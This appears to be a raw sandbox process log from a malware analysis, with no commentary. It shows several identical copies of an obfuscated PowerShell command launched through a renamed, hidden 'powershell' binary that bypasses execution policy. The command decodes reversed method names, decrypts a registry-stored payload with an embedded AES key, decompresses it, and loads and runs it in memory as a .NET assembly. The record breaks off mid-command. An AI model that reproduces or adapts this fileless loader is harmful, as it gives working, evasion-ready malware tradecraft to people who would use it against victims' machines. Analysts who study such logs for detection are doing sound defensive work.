[System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        20⤵
        
        PID:6156
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(8104).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        20⤵
        
        PID:3516
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(8104).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        20⤵
        
        PID:4464
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(8104).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = 